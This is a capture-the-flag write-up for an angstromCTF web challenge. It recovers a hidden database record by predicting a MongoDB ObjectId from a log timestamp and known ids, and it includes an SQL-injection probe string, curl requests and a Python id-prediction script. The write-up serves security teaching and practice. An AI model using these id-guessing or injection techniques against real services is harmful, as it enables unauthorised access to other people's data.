I have created what I believe to be the best website ever. Or maybe it’s just really boring. I don’t know.
After checking the source code of the page, I noticed the following comment:
```html
<!--developers: make sure to record your actions in log.txt-->
```
Then I decided to check the log.txt file.
```bash
$ curl 'http://web.angstromctf.com:7667/log.txt'
Sat Aug 10 2017 10:23:17 GMT-0400 (EDT) - Initial website
Sat Aug 10 2017 14:54:07 GMT-0400 (EDT) - Database integration
Sat Aug 11 2017 14:08:54 GMT-0400 (EDT) - Make some changes to the text
Sat Mar 17 2018 16:24:17 GMT+0000 (UTC) - Add super secret flag to database
```
Now, we know the flag is in the database. After watching the web browser’s network traffic during the load of the index page, I found the following request:
```http
GET /boxes?ids=5aad412be07e1e001cfce6d2,5aad412be07e1e001cfce6d3,5aad412be07e1e001cfce6d4 HTTP/1.1
Host: web.angstromctf.com:7667
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://web.angstromctf.com:7667/
X-Requested-With: XMLHttpRequest
Connection: keep-alive
If-None-Match: W/"183-Tv299FSONRL0nObibB59WErSwqE"
Cache-Control: max-age=0
```
Here is the response to that request.
```json
{"boxes":[{"_id":"5aad412be07e1e001cfce6d2","data":"Go away.^This website has literally nothing of interest. You might as well leave.","__v":0},{"_id":"5aad412be07e1e001cfce6d3","data":"You will be very bored.^Seriously, there's nothing interesting.","__v":0},{"_id":"5aad412be07e1e001cfce6d4","data":"Please just leave.^Scrolling more will only give you more boring content.","__v":0}]}
```
This request makes an SQL query to retrieve the information. Let’s play with it a little bit.
```bash
$ curl 'http://web.angstromctf.com:7667/boxes?ids=1,2,3'
{"boxes":[null,null,null]}
$ curl 'http://web.angstromctf.com:7667/boxes?ids=1,2,3,4'
number of ids does not equal 3
$ curl "http://web.angstromctf.com:7667/boxes?ids=1,2,3)'+or+1=1%23"
{"boxes":[null,null,null]}
```
It simply returns exactly 3 objects from the database using their ids. I tried to find some SQL injection, but failed. Then I started to analyze the 3 working object ids. They are 96 bits long, and log.txt only provided us with the timestamp of the flag's addition. The only thing that came to my mind was ObjectIds.
An ObjectId is a 12-byte BSON type with the following structure:
- The first 4 bytes are the seconds since the Unix epoch.
- The next 3 bytes are the machine identifier.
- The next 2 bytes are the process id.
- The last 3 bytes are the counter value.
Let’s calculate the first 4 bytes using the flag’s addition time Sat Mar 17 2018 16:24:17 GMT+0000 (UTC).
We can use this website to convert the timestamp to hexadecimal. Our result is 5aad4131.
We will retrieve the machine id and process id from the known ObjectIds.
MachineID is e07e1e.
ProcessID is 001c.
Our counter value should be the last known counter value + 1, which is fce6d5.
If we merge them all, our flag’s ObjectId is 5aad4131e07e1e001cfce6d5.
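To make the reconstruction above mechanical, here is an added Python example (not part of the original writeup) that splits the three known ids into the four fields listed above, checks that they all share one machine id and process id, converts the log.txt time to epoch seconds, and assembles the predicted id with the next counter value. The function names are my own; the ids and timestamp are the ones from this page.

```python
from datetime import datetime

# The three ObjectIds returned by /boxes (values taken from this writeup).
KNOWN_IDS = [
    "5aad412be07e1e001cfce6d2",
    "5aad412be07e1e001cfce6d3",
    "5aad412be07e1e001cfce6d4",
]
# Flag creation time exactly as it appears in log.txt.
FLAG_ADDED_AT = "Sat Mar 17 2018 16:24:17 GMT+0000 (UTC)"


def parse_object_id(oid):
    """Split a 24-hex-char ObjectId into timestamp, machine, pid and counter."""
    if len(oid) != 24:
        raise ValueError("ObjectId must be 12 bytes (24 hex chars)")
    raw = bytes.fromhex(oid)
    return {
        "timestamp": int.from_bytes(raw[0:4], "big"),  # seconds since epoch
        "machine": raw[4:7].hex(),                      # 3-byte machine id
        "pid": int.from_bytes(raw[7:9], "big"),         # 2-byte process id
        "counter": int.from_bytes(raw[9:12], "big"),    # 3-byte counter
    }


def parse_log_time(log_time):
    """Convert a log.txt timestamp (JavaScript Date format) to epoch seconds."""
    # Drop the trailing "(UTC)" / "(EDT)" label; the numeric offset is enough.
    core = log_time.split(" (")[0]
    return int(datetime.strptime(core, "%a %b %d %Y %H:%M:%S GMT%z").timestamp())


def predict_object_id(known_ids, created_at):
    """Build the ObjectId a later insert from the same process would get."""
    parsed = [parse_object_id(k) for k in known_ids]
    machines = {p["machine"] for p in parsed}
    pids = {p["pid"] for p in parsed}
    if len(machines) != 1 or len(pids) != 1:
        raise ValueError("known ids come from different processes; cannot predict")
    # The counter is 3 bytes and wraps around.
    next_counter = (max(p["counter"] for p in parsed) + 1) & 0xFFFFFF
    ts = parse_log_time(created_at)
    return (
        ts.to_bytes(4, "big")
        + bytes.fromhex(machines.pop())
        + pids.pop().to_bytes(2, "big")
        + next_counter.to_bytes(3, "big")
    ).hex()


if __name__ == "__main__":
    for k in KNOWN_IDS:
        print(k, parse_object_id(k))
    print("predicted:", predict_object_id(KNOWN_IDS, FLAG_ADDED_AT))
```

The check that machine id and process id agree across the known ids matters: if the boxes had been created by different server processes, the guess would have no single value to reuse and the id would not be predictable this way.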
Let’s try to retrieve the flag using the ObjectId we found.
```bash
$ curl 'http://web.angstromctf.com:7667/boxes?ids=5aad4131e07e1e001cfce6d5,2,3'
{"boxes":[{"_id":"5aad4131e07e1e001cfce6d5","data":"actf{0bj3ct_ids_ar3nt_s3cr3ts}","__v":0},null,null]}
```
Here is the flag: actf{0bj3ct_ids_ar3nt_s3cr3ts}.